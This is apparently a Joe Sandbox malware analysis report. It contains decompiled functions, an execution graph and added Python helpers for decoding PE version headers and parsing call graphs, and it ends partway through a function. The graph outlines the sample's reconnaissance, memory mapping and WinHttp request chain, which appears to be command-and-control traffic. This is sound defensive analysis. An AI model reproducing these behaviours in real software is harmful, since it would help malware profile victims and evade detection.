                                                  					if( *_t34 != 0x5c) {
                                                  						L7:
                                                  						_t15 = E00042D2E(_t34,  &_a4);
                                                  						__eflags = _t15;
                                                  						if(_t15 == 0) {
                                                  							__eflags = E00042815(_t34, L"\\\\?\\", 4);
                                                  							if(__eflags == 0) {
                                                  								L18:
                                                  								_t17 = E00042963(__eflags, _t34);
                                                  								__eflags = _t17;
                                                  								if(_t17 == 0) {
                                                  									goto L21;
                                                  								}
                                                  								__eflags = _t34[0x30] - 0x5c;
                                                  								if(_t34[0x30] != 0x5c) {
                                                  									goto L21;
                                                  								}
                                                  								__eflags = _t34[0x31];
                                                  								if(_t34[0x31] == 0) {
                                                  									goto L4;
                                                  								}
                                                  								goto L21;
                                                  							}
                                                  							__eflags = iswalpha(_t34[4] & 0x0000ffff);
                                                  							if(__eflags == 0) {
                                                  								goto L18;
                                                  							}
                                                  							__eflags = E00042815( &(_t34[5]), _t33, 3);
                                                  							if(__eflags != 0) {
                                                  								goto L4;
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t30 = _a4;
                                                  						_t32 = 0;
                                                  						while(1) {
                                                  							_t24 =  *_t30 & 0x0000ffff;
                                                  							__eflags = _t24;
                                                  							if(_t24 == 0) {
                                                  								goto L4;
                                                  							}
                                                  							__eflags = _t24 - 0x5c;
                                                  							if(_t24 != 0x5c) {
                                                  								L12:
                                                  								_t30 =  &(_t30[1]);
                                                  								__eflags = _t30;
                                                  								continue;
                                                  							}
                                                  							_t32 = _t32 + 1;
                                                  							__eflags = _t32 - 1;
                                                  							if(_t32 > 1) {
                                                  								goto L21;
                                                  							}
                                                  							__eflags = _t30[1];
                                                  							if(_t30[1] == 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L12;
                                                  						}
                                                  						goto L4;
                                                  					}
                                                  					__eflags = _t34[1];
                                                  					if(_t34[1] == 0) {
                                                  						goto L4;
                                                  					}
                                                  					goto L7;
                                                  				} else {
                                                  					L4:
                                                  					return 1;
                                                  				}
                                                  			}

                                                  Control-flow addresses for the statements of the function above (the per-line address column of the report's control-flow view; 0x00000000 where the line maps to no instruction): 0x00042dac, 0x00042db2, 0x00042e79, 0x00042e79, 0x00000000, 0x00042e79, 0x00042db8, 0x00042dbe, 0x00000000, 0x00000000, 0x00042dcb, 0x00042dce, 0x00042dd5, 0x00042def, 0x00042df3, 0x00042dfc, 0x00042e01, 0x00042e06, 0x00042e08, 0x00042e3d, 0x00042e3f, 0x00042e5d, 0x00042e5e, 0x00042e63, 0x00042e65, 0x00000000, 0x00000000, 0x00042e67, 0x00042e6c, 0x00000000, 0x00000000, 0x00042e6e, 0x00042e73, 0x00000000, 0x00000000, 0x00000000, 0x00042e73, 0x00042e49, 0x00042e4b, 0x00000000, 0x00000000, 0x00042e59, 0x00042e5b, 0x00000000, 0x00000000, 0x00000000, 0x00042e5b, 0x00042e0a, 0x00042e0d, 0x00042e26, 0x00042e26, 0x00042e29, 0x00042e2c, 0x00000000, 0x00000000, 0x00042e11, 0x00042e15, 0x00042e24, 0x00042e25, 0x00042e25, 0x00000000, 0x00042e25, 0x00042e17, 0x00042e18, 0x00042e1b, 0x00000000, 0x00000000, 0x00042e1d, 0x00042e22, 0x00000000, 0x00000000, 0x00000000, 0x00042e22, 0x00000000, 0x00042e26, 0x00042df5, 0x00042dfa, 0x00000000, 0x00000000, 0x00000000, 0x00042de7, 0x00042de7, 0x00000000, 0x00042de9

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: iswalpha
                                                  • String ID: \\?\
                                                  • API String ID: 2011389249-4282027825
                                                  • Opcode ID: 15487929008c5bb99a72ef31a52cafefcaed08058816d459474b721bcbb06038
                                                  • Instruction ID: f548e48338997ca3cb12741222b9673a2053cc88c8cd5c4e02c0f2b5c406b58d
                                                  • Opcode Fuzzy Hash: 15487929008c5bb99a72ef31a52cafefcaed08058816d459474b721bcbb06038
                                                  • Instruction Fuzzy Hash: A821D4E5B01701A5EBB46666CC81ABB72ECEF85790FD4843DFE81C6085EB64CC82C16C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			/* Rewrites the process's PEB OS-version fields from the image's own headers. This mirrors the
                                                  			   Win32VersionValue handling in ntdll's process initialisation: a non-zero Win32VersionValue in
                                                  			   the optional header overrides OSMajorVersion/OSMinorVersion/OSBuildNumber/OSPlatformId, and a
                                                  			   non-zero CSDVersion in the load-config directory overrides OSCSDVersion. PEB offsets are x86. */
                                                  			E00041467(void* __ecx, void* _a4) {
                                                  				char _v8;
                                                  				intOrPtr _t17;
                                                  				signed int _t18;
                                                  				intOrPtr _t29;

                                                  				_t17 =  *[fs:0x18];                                   /* TEB */
                                                  				_t29 =  *((intOrPtr*)(_t17 + 0x30));                  /* TEB->ProcessEnvironmentBlock */
                                                  				RtlImageNtHeader(_a4);                                /* decompiler (quality 37%) dropped the return value: from here on _t17 is the IMAGE_NT_HEADERS* it returned, not the TEB; the offsets 0x14 and 0x4c only make sense there */
                                                  				/* FileHeader.SizeOfOptionalHeader (+0x14) and OptionalHeader.Win32VersionValue (+0x4c) must both be non-zero */
                                                  				if( *((short*)(_t17 + 0x14)) != 0 &&  *(_t17 + 0x4c) != 0) {
                                                  					 *(_t29 + 0xa4) =  *(_t17 + 0x4c) & 0x000000ff;             /* PEB->OSMajorVersion = bits 0-7   */
                                                  					 *(_t29 + 0xa8) =  *(_t17 + 0x4d) & 0x000000ff;             /* PEB->OSMinorVersion = bits 8-15  */
                                                  					 *(_t29 + 0xac) =  *(_t17 + 0x4e) & 0x00003fff;             /* PEB->OSBuildNumber  = bits 16-29 */
                                                  					 *(_t29 + 0xb0) = ( *(_t17 + 0x4c) ^ 0xbfffffff) >> 0x1e;  /* PEB->OSPlatformId   = bits 30-31, bit 31 inverted */
                                                  				}
                                                  				_t18 =  &_v8;
                                                  				/* IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG (0xa) of PEB->ImageBaseAddress (+8); the return value, again lost by the decompiler, is what is tested next */
                                                  				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t29 + 8)), 1, 0xa, _t18);
                                                  				if(_t18 != 0) {
                                                  					_t18 =  *(_t18 + 0x34) & 0x0000ffff;              /* IMAGE_LOAD_CONFIG_DIRECTORY.CSDVersion */
                                                  					if(_t18 != 0) {
                                                  						 *(_t29 + 0xae) = _t18;                          /* PEB->OSCSDVersion */
                                                  					}
                                                  				}
                                                  				return _t18;
                                                  			}

                                                  Control-flow addresses for the statements of the function above (the per-line address column of the report's control-flow view): 0x0004146d, 0x00041477, 0x0004147a, 0x00041485, 0x000423b7, 0x000423c1, 0x000423d3, 0x000423e5, 0x000423e5, 0x00041491, 0x0004149c, 0x000414a4, 0x000414a6, 0x000414ad, 0x000423f0, 0x000423f0, 0x000414ad, 0x000414b5

                                                  APIs
                                                  • RtlImageNtHeader.NTDLL(?), ref: 0004147A
                                                  • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,000412FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0004149C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Image$DataDirectoryEntryHeader
                                                  • String ID: )G`v
                                                  • API String ID: 3478907836-1429216067
                                                  • Opcode ID: 9bfb99aa9b0e309ccce79efe09282ca03bf6fc8b52d91e4de0065fef7cc8310e
                                                  • Instruction ID: 96c39e6913cea9db7385fb6d85c78f4697125022228ab5aac0ece6b65465dcb0
                                                  • Opcode Fuzzy Hash: 9bfb99aa9b0e309ccce79efe09282ca03bf6fc8b52d91e4de0065fef7cc8310e
                                                  • Instruction Fuzzy Hash: 5E01F5B0624354EFC7208F21D500BE37BF4EF05710F0144A9F6968B2A1E374E980CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
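The function E00041467 above takes the OS version a process reports to itself from the PE headers rather than from the real system: a non-zero Win32VersionValue in the optional header is split into major, minor, build and platform and written into the PEB, and a non-zero CSDVersion in the load-config directory overwrites the service-pack field. The decoder below is an added editorial example, not code from the report or from the sample: it applies the same masks, shifts and conditions to a constructed IMAGE_NT_HEADERS32 buffer and load-config blob so an analyst can see which PEB values a given header would produce. It assumes only the offsets visible in the decompilation (+0x14 SizeOfOptionalHeader, +0x4c Win32VersionValue, +0x34 CSDVersion in the load config) and the x86 PEB offsets named in the comments; the sample header values are constructed, not taken from the analysed file.

```python
import struct

# Offsets visible in the decompiled E00041467 (relative to IMAGE_NT_HEADERS32).
OFF_SIZE_OF_OPTIONAL_HEADER = 0x14   # FileHeader.SizeOfOptionalHeader
OFF_WIN32_VERSION_VALUE = 0x4C       # OptionalHeader.Win32VersionValue
OFF_LOADCFG_CSD_VERSION = 0x34       # IMAGE_LOAD_CONFIG_DIRECTORY.CSDVersion


def decode_win32_version_value(value):
    """Split Win32VersionValue exactly as E00041467 does before storing it in the PEB.

    bits 0-7   -> OSMajorVersion (PEB+0xa4)
    bits 8-15  -> OSMinorVersion (PEB+0xa8)
    bits 16-29 -> OSBuildNumber  (PEB+0xac)
    bits 30-31 -> OSPlatformId   (PEB+0xb0); the XOR with 0xbfffffff inverts bit 31
    """
    value &= 0xFFFFFFFF
    return {
        "OSMajorVersion": value & 0xFF,
        "OSMinorVersion": (value >> 8) & 0xFF,
        "OSBuildNumber": (value >> 16) & 0x3FFF,
        "OSPlatformId": ((value ^ 0xBFFFFFFF) >> 30) & 0x3,
    }


def peb_os_fields(nt_headers, load_config=None):
    """Return the PEB fields E00041467 would write for these headers ({} if it writes none).

    nt_headers:  bytes starting at the 'PE\\0\\0' signature
    load_config: bytes of IMAGE_LOAD_CONFIG_DIRECTORY, or None if the image has none
    """
    fields = {}
    (size_of_optional,) = struct.unpack_from("<H", nt_headers, OFF_SIZE_OF_OPTIONAL_HEADER)
    (win32_version,) = struct.unpack_from("<I", nt_headers, OFF_WIN32_VERSION_VALUE)
    # Both conditions must hold, matching the decompiled 'if'.
    if size_of_optional != 0 and win32_version != 0:
        fields.update(decode_win32_version_value(win32_version))
    if load_config is not None and len(load_config) >= OFF_LOADCFG_CSD_VERSION + 2:
        (csd,) = struct.unpack_from("<H", load_config, OFF_LOADCFG_CSD_VERSION)
        if csd != 0:
            fields["OSCSDVersion"] = csd   # PEB+0xae
    return fields


def build_sample_headers(major, minor, build, platform_bits, csd):
    """Constructed sample input (not from the analysed file): a zeroed IMAGE_NT_HEADERS32
    carrying only the fields the decoder reads, plus a minimal load-config directory."""
    nt = bytearray(0xF8)                                            # sizeof(IMAGE_NT_HEADERS32)
    nt[0:4] = b"PE\x00\x00"
    struct.pack_into("<H", nt, OFF_SIZE_OF_OPTIONAL_HEADER, 0xE0)   # PE32 optional header size
    value = (platform_bits << 30) | ((build & 0x3FFF) << 16) | (minor << 8) | major
    struct.pack_into("<I", nt, OFF_WIN32_VERSION_VALUE, value)
    cfg = bytearray(0x40)
    struct.pack_into("<I", cfg, 0, len(cfg))                        # Size
    struct.pack_into("<H", cfg, OFF_LOADCFG_CSD_VERSION, csd)
    return bytes(nt), bytes(cfg)


def demo():
    # A header claiming "6.1 build 7601, SP1"; top bits 00 decode to OSPlatformId 2 (VER_PLATFORM_WIN32_NT).
    nt, cfg = build_sample_headers(6, 1, 7601, 0b00, 0x0100)
    return peb_os_fields(nt, cfg)


if __name__ == "__main__":
    for name, val in demo().items():
        print(f"{name:15s} = {val:#x}")
```

The platform decode is the part worth keeping in mind when reading dumps: because bit 31 is inverted, a Win32VersionValue whose top two bits are zero yields OSPlatformId 2, so a header that sets only the low bytes still presents as an NT platform. Anything that calls GetVersion or reads the PEB inside such a process sees the header's values, not the host's.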

                                                  Execution Graph

                                                  Execution Coverage: 4.5%
                                                  Dynamic/Decrypted Code Coverage: 81.7%
                                                  Signature Coverage: 40%
                                                  Total number of Nodes: 230
                                                  Total number of Limit Nodes: 19
                                                  execution_graph 6530 120000 6531 120036 6530->6531 6532 120127 GetNativeSystemInfo 6531->6532 6538 1204e1 6531->6538 6533 12015f VirtualAlloc 6532->6533 6532->6538 6535 12017d 6533->6535 6534 120341 6537 1204bd VirtualProtect 6534->6537 6534->6538 6535->6534 6536 1202f1 LoadLibraryA 6535->6536 6536->6535 6537->6534 6539 7fef74d2cca 6540 7fef74d2f92 CryptCreateHash 6539->6540 6541 7fef74d2f68 6540->6541 6542 7fef74d36fa 6544 7fef74d3708 6542->6544 6543 7fef74d36ec 6544->6542 6544->6543 6545 7fef74d3834 RtlAllocateHeap 6544->6545 6545->6543 6545->6544 6806 7fef74d2cda 6807 7fef74d2ce9 CryptCreateHash 6806->6807 6808 7fef74d3134 6807->6808 6808->6808 6546 180002aa4 6549 180002174 6546->6549 6550 180002190 SleepEx 6549->6550 6550->6550 6551 1800021b4 wsprintfW 6550->6551 6552 1800021d1 6551->6552 6566 180002860 GetProcessHeap RtlAllocateHeap 6552->6566 6555 1800021e5 6581 180001d80 wsprintfW 6555->6581 6556 18000224e 6561 180002232 6602 180001b5c GetProcessHeap HeapAlloc 6561->6602 6562 18000221e GetProcessHeap HeapFree 6562->6561 6567 1800028a1 wsprintfW wsprintfW 6566->6567 6568 1800021e0 6566->6568 6661 180001484 GetTickCount64 6567->6661 6568->6555 6568->6556 6570 1800028e7 wsprintfW 6612 18000108c 6570->6612 6574 18000292f 6633 1800027b4 6574->6633 6576 18000293b 6636 180002018 GetComputerNameExW 6576->6636 6580 180002956 6580->6568 6582 180001db5 6581->6582 6584 180001e2e 6582->6584 6586 180001e1a Sleep 6582->6586 6587 180001e06 GetProcessHeap HeapFree 6582->6587 6589 180001e27 6582->6589 6693 180001b08 6582->6693 6696 180001760 6582->6696 6585 180001e33 GetProcessHeap HeapFree 6584->6585 6584->6589 6585->6589 6586->6582 6587->6586 6589->6556 6590 180001198 6589->6590 6591 1800011a9 6590->6591 6601 180001211 6590->6601 6591->6601 6725 180001688 SHGetFolderPathA 6591->6725 6594 1800011cb GetLastError 6594->6601 6595 1800011dc 6730 180001000 GetTempPathA 6595->6730 6598 1800011ed GetLastError 6598->6601 6599 
1800011ff 6737 180002268 6599->6737 6601->6561 6601->6562 6603 180001bc2 6602->6603 6604 180001b92 6602->6604 6603->6556 6607 180002480 wsprintfW 6603->6607 6605 1800014b4 6 API calls 6604->6605 6606 180001ba4 wsprintfW 6605->6606 6606->6603 6608 180001b08 19 API calls 6607->6608 6609 1800024ca 6608->6609 6610 1800024f0 6609->6610 6611 1800024dc GetProcessHeap HeapFree 6609->6611 6610->6556 6611->6610 6613 1800010a3 6612->6613 6614 1800010a8 LoadLibraryA GetProcAddress 6613->6614 6615 1800010cd NtQuerySystemInformation 6613->6615 6618 1800010f5 GetProcessHeap 6613->6618 6621 18000112f wsprintfW 6613->6621 6614->6615 6619 180001135 6614->6619 6615->6613 6616 180001131 6615->6616 6617 18000116b 6616->6617 6616->6619 6620 180001170 GetProcessHeap HeapFree 6617->6620 6617->6621 6622 18000111a RtlAllocateHeap 6618->6622 6623 18000110c HeapReAlloc 6618->6623 6619->6621 6624 180001153 GetProcessHeap HeapFree 6619->6624 6620->6621 6625 180001904 6621->6625 6622->6613 6623->6613 6624->6621 6626 18000192d LoadLibraryA GetProcAddress 6625->6626 6627 18000199a wsprintfW wsprintfW 6626->6627 6630 180001953 6626->6630 6628 1800019da wsprintfW 6627->6628 6662 180001bd4 6628->6662 6630->6627 6632 18000195e wsprintfW wsprintfW 6630->6632 6632->6628 6666 180002c88 6633->6666 6637 180002062 6636->6637 6673 1800014b4 6637->6673 6640 1800020a1 6641 1800014b4 6 API calls 6640->6641 6642 1800020be 6641->6642 6643 1800014b4 6 API calls 6642->6643 6644 1800020d4 6643->6644 6679 180001c28 GetComputerNameExW 6644->6679 6647 180002144 wsprintfW 6649 180002142 6647->6649 6648 1800020ff wsprintfW 6650 18000213d 6648->6650 6652 18000133c LoadLibraryA GetProcAddress 6649->6652 6650->6649 6651 180002117 wsprintfW 6650->6651 6651->6650 6653 180001388 GetAdaptersInfo 6652->6653 6660 1800013df 6652->6660 6654 180001396 6653->6654 6653->6660 6655 18000139f GetProcessHeap HeapAlloc 6654->6655 6654->6660 6656 1800013bd GetAdaptersInfo 6655->6656 6655->6660 6657 1800013cb GetProcessHeap HeapFree 
6656->6657 6658 180001414 6656->6658 6657->6660 6659 18000145f GetProcessHeap HeapFree 6658->6659 6659->6660 6660->6580 6661->6570 6663 180001bea LoadLibraryA GetProcAddress 6662->6663 6664 1800019ff wsprintfW 6663->6664 6665 180001c0e GetNativeSystemInfo 6663->6665 6664->6574 6665->6664 6667 180002cb5 6666->6667 6670 180002ac0 6667->6670 6671 180002adb SwitchToThread SwitchToThread 6670->6671 6671->6671 6672 1800027cb wsprintfW wsprintfW wsprintfW wsprintfW 6671->6672 6672->6576 6674 1800014d7 6673->6674 6689 180001604 lstrlenW 6674->6689 6677 18000154c GetProcessHeap HeapFree 6678 180001560 GetUserNameW 6677->6678 6678->6640 6680 180001d68 6679->6680 6681 180001c60 LookupAccountNameW 6679->6681 6680->6647 6680->6648 6681->6680 6682 180001c96 GetLastError 6681->6682 6682->6680 6683 180001ca5 6682->6683 6683->6680 6684 180001cb0 GetProcessHeap HeapAlloc 6683->6684 6684->6680 6685 180001cd6 LookupAccountNameW 6684->6685 6686 180001d54 GetProcessHeap HeapFree 6685->6686 6688 180001d08 GetProcessHeap HeapFree 6685->6688 6686->6680 6688->6680 6690 1800014f9 6689->6690 6691 180001627 GetProcessHeap HeapAlloc 6689->6691 6690->6677 6690->6678 6691->6690 6692 180001647 WideCharToMultiByte 6691->6692 6692->6690 6702 1800024fc WinHttpOpen 6693->6702 6697 18000178e 6696->6697 6699 1800018de 6696->6699 6698 180001801 GetProcessHeap HeapAlloc 6697->6698 6697->6699 6700 180001827 6697->6700 6698->6699 6698->6700 6699->6582 6700->6699 6701 1800018ca GetProcessHeap HeapFree 6700->6701 6701->6699 6703 180002556 6702->6703 6704 180001b54 6702->6704 6705 180002574 WinHttpConnect 6703->6705 6706 180002568 WinHttpSetStatusCallback 6703->6706 6704->6582 6707 180002594 WinHttpOpenRequest 6705->6707 6708 180002790 WinHttpCloseHandle 6705->6708 6706->6705 6709 180002787 WinHttpCloseHandle 6707->6709 6710 1800025e8 6707->6710 6708->6704 6709->6708 6711 18000260b WinHttpSendRequest 6710->6711 6712 1800025ed WinHttpSetOption 6710->6712 6713 18000277e WinHttpCloseHandle 6711->6713 6714 
18000263f WinHttpReceiveResponse 6711->6714 6712->6711 6713->6709 6714->6713 6715 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6714->6715 6716 1800026b6 WinHttpQueryDataAvailable 6715->6716 6717 180002734 6716->6717 6718 1800026ca 6716->6718 6719 180002760 6717->6719 6721 18000274c GetProcessHeap HeapFree 6717->6721 6718->6716 6718->6717 6720 1800026d7 GetProcessHeap 6718->6720 6724 18000270f WinHttpReadData 6718->6724 6719->6713 6722 1800026fc HeapAlloc 6720->6722 6723 1800026ee HeapReAlloc 6720->6723 6721->6719 6722->6718 6723->6718 6724->6717 6724->6718 6726 1800016e1 6 API calls 6725->6726 6727 1800016da 6725->6727 6747 180002a18 CreateFileA 6726->6747 6727->6726 6731 180001042 lstrcatA 6730->6731 6732 180001038 6730->6732 6733 180001061 6731->6733 6732->6731 6734 180002a18 CreateFileA 6733->6734 6735 1800011e9 6734->6735 6736 180002a5b WriteFile CloseHandle 6734->6736 6735->6598 6735->6599 6736->6735 6750 180001f2c lstrcpyA SHGetFolderPathA 6737->6750 6740 180002311 GetProcessHeap HeapAlloc 6741 180002338 6740->6741 6745 1800023f3 6740->6745 6742 180002415 6741->6742 6743 1800023d5 6741->6743 6756 180002b5c VirtualAlloc 6742->6756 6743->6745 6746 1800023df GetProcessHeap HeapFree 6743->6746 6745->6601 6746->6745 6748 1800011c7 6747->6748 6749 180002a5b WriteFile CloseHandle 6747->6749 6748->6594 6748->6595 6749->6748 6751 180001f95 lstrcatA 6750->6751 6752 180001f86 lstrcpyA 6750->6752 6753 180001fa2 lstrcatA lstrcpyA 6751->6753 6752->6753 6754 180001ff6 6753->6754 6755 180001fe0 lstrcpyA 6753->6755 6754->6740 6754->6741 6754->6745 6755->6754 6757 180002b95 GetLastError 6756->6757 6758 180002baa 6756->6758 6759 180002c00 6757->6759 6758->6759 6767 180001e64 6758->6767 6759->6745 6762 180002c16 GetLastError 6762->6759 6763 180002c28 6764 180002c56 6763->6764 6765 180002c2d VirtualProtect 6763->6765 6764->6759 6766 180002c63 GetLastError 6764->6766 6765->6764 6765->6765 6766->6759 6769 180001f08 6767->6769 6770 180001e8a 6767->6770 6768 180001e97 
LoadLibraryA 6768->6769 6768->6770 6769->6762 6769->6763 6770->6768 6770->6769 6771 180001ed0 GetProcAddress 6770->6771 6771->6769 6771->6770 6799 7fef74d5ff9 6800 7fef74d6173 6799->6800 6801 7fef74d620e NtCreateSection 6800->6801 6802 7fef74d621e 6800->6802 6805 7fef74d616d 6800->6805 6801->6802 6803 7fef74d66a7 NtMapViewOfSection 6802->6803 6804 7fef74d66d4 6802->6804 6803->6802 6793 7fef74d5fe6 6794 7fef74d5fdd 6793->6794 6795 7fef74d5fed 6793->6795 6796 7fef74d620e NtCreateSection 6795->6796 6797 7fef74d621e 6795->6797 6796->6797 6797->6794 6798 7fef74d66a7 NtMapViewOfSection 6797->6798 6798->6797 6772 180001b08 6773 1800024fc 19 API calls 6772->6773 6774 180001b54 6773->6774 6775 180001318 6776 180001329 6775->6776 6777 180001332 ExitProcess 6776->6777 6778 18000131e SleepEx 6776->6778 6778->6776 6779 7fef74d2cf7 6780 7fef74d2cda CryptCreateHash 6779->6780 6781 7fef74d2d01 CryptAcquireContextW 6779->6781 6783 7fef74d2faa 6780->6783 6781->6783 6783->6783 6784 18000244c 6785 180002474 6784->6785 6786 180002455 CreateThread 6784->6786 6786->6785 6787 7fef74d6271 6788 7fef74d623f 6787->6788 6788->6787 6789 7fef74d620e NtCreateSection 6788->6789 6792 7fef74d621e 6788->6792 6789->6792 6790 7fef74d66a7 NtMapViewOfSection 6790->6792 6791 7fef74d66d4 6792->6790 6792->6791
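The execution_graph dump above is a flat token stream rather than a drawing: a node is a decimal id followed by a lowercase hex address and zero or more API names (or a collapsed callee written as "N API calls"), and an edge is written id->id. The script below is an added editorial example, not part of the Joe Sandbox report, that parses that stream and walks it, so the API sequence behind a cluster such as the WinHttp chain in the rundll32-hosted module can be read off instead of traced by eye. The sample input is the WinHttp sub-graph copied from the dump above (node 6693 and nodes 6702 to 6724, plus the summarised node 6605); the node-recognition rule (a decimal token directly followed by a hex token starts a node) is an assumption drawn from how the dump reads, not a published grammar.

```python
import re
from collections import deque

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_DEC = re.compile(r"^\d+$")
_HEX = re.compile(r"^[0-9a-f]+$")


def parse_execution_graph(text):
    """Parse the token stream into (nodes, adjacency).

    nodes:     {id: {"addr": str, "apis": [names...], "summary": int or None}}
    adjacency: {id: [successor ids in declaration order]}
    """
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, adj, cur = {}, {}, None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            adj.setdefault(m.group(1), []).append(m.group(2))
            i += 1
        elif _DEC.match(tok) and i + 2 < len(tokens) and tokens[i + 1] == "API" and tokens[i + 2] == "calls":
            # "N API calls": the report collapsed a callee into a count on the current node.
            if cur is not None:
                nodes[cur]["summary"] = int(tok)
            i += 3
        elif _DEC.match(tok) and i + 1 < len(tokens) and _HEX.match(tokens[i + 1]):
            cur = tok
            nodes[cur] = {"addr": tokens[i + 1], "apis": [], "summary": None}
            i += 2
        else:
            # Any other token is an API name attached to the most recent node.
            if cur is not None:
                nodes[cur]["apis"].append(tok)
            i += 1
    for n in nodes:
        adj.setdefault(n, [])
    return nodes, adj


def reachable(adj, start):
    """Depth-first, declaration-order traversal; returns node ids in visit order."""
    order, seen, stack = [], set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        order.append(n)
        stack.extend(reversed(adj.get(n, [])))
    return order


def shortest_path_to_api(nodes, adj, start, api):
    """BFS from start to the first node that calls `api`; returns the node-id path, or None."""
    prev = {start: None}
    q = deque([start])
    while q:
        n = q.popleft()
        if api in nodes.get(n, {}).get("apis", []):
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for s in adj.get(n, []):
            if s not in prev:
                prev[s] = n
                q.append(s)
    return None


def apis_along(nodes, path):
    """Flatten the API calls made along a node path, keeping repeats (6715 calls WinHttpQueryHeaders twice)."""
    return [a for n in path for a in nodes[n]["apis"]]


# Constructed sample: the WinHttp sub-graph copied from the dump above, plus one summarised node.
SAMPLE_GRAPH = """
6693 180001b08 6702 1800024fc WinHttpOpen 6693->6702
6703 180002556 6702->6703 6704 180001b54 6702->6704
6705 180002574 WinHttpConnect 6703->6705 6706 180002568 WinHttpSetStatusCallback 6703->6706
6707 180002594 WinHttpOpenRequest 6705->6707 6708 180002790 WinHttpCloseHandle 6705->6708 6706->6705
6709 180002787 WinHttpCloseHandle 6707->6709 6710 1800025e8 6707->6710 6708->6704 6709->6708
6711 18000260b WinHttpSendRequest 6710->6711 6712 1800025ed WinHttpSetOption 6710->6712
6713 18000277e WinHttpCloseHandle 6711->6713 6714
18000263f WinHttpReceiveResponse 6711->6714 6712->6711 6713->6709 6714->6713
6715 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6714->6715
6716 1800026b6 WinHttpQueryDataAvailable 6715->6716 6717 180002734 6716->6717 6718 1800026ca 6716->6718
6719 180002760 6717->6719 6721 18000274c GetProcessHeap HeapFree 6717->6721 6718->6716 6718->6717
6720 1800026d7 GetProcessHeap 6718->6720 6724 18000270f WinHttpReadData 6718->6724 6719->6713
6722 1800026fc HeapAlloc 6720->6722 6723 1800026ee HeapReAlloc 6720->6723 6721->6719 6722->6718 6723->6718 6724->6717 6724->6718
6605 1800014b4 6 API calls
"""


def c2_request_chain():
    """Shortest route from the WinHttpOpen caller (6693) to WinHttpReadData, as an API sequence."""
    nodes, adj = parse_execution_graph(SAMPLE_GRAPH)
    path = shortest_path_to_api(nodes, adj, "6693", "WinHttpReadData")
    return apis_along(nodes, path)


if __name__ == "__main__":
    nodes, adj = parse_execution_graph(SAMPLE_GRAPH)
    print(len(nodes), "nodes,", sum(len(v) for v in adj.values()), "edges")
    print(" -> ".join(c2_request_chain()))
```

Run against the full dump (paste it into SAMPLE_GRAPH or read it from a file), the same BFS from any entry node gives the API order of that call tree, which is the form most useful for writing a behavioural signature: the open/connect/open-request/send/receive/query/read sequence is the request lifecycle the Similarity block below summarises as its Http API group together with the GET and POST strings.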

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
                                                  • String ID: GET$POST
                                                  • API String ID: 1614834629-3192705859
                                                  • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                                  • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
                                                  • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                                  • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 22%
                                                  			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                  				void* __rdi;
                                                  				void* _t16;
                                                  				void* _t19;
                                                  				long long* _t34;
                                                  				void* _t48;
                                                  				long long* _t54;
                                                  				long long* _t56;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				struct HINSTANCE__* _t64;
                                                  				CHAR* _t67;
                                                  
                                                  				_t34 = _t56;
                                                  				 *((long long*)(_t34 + 8)) = __rbx;
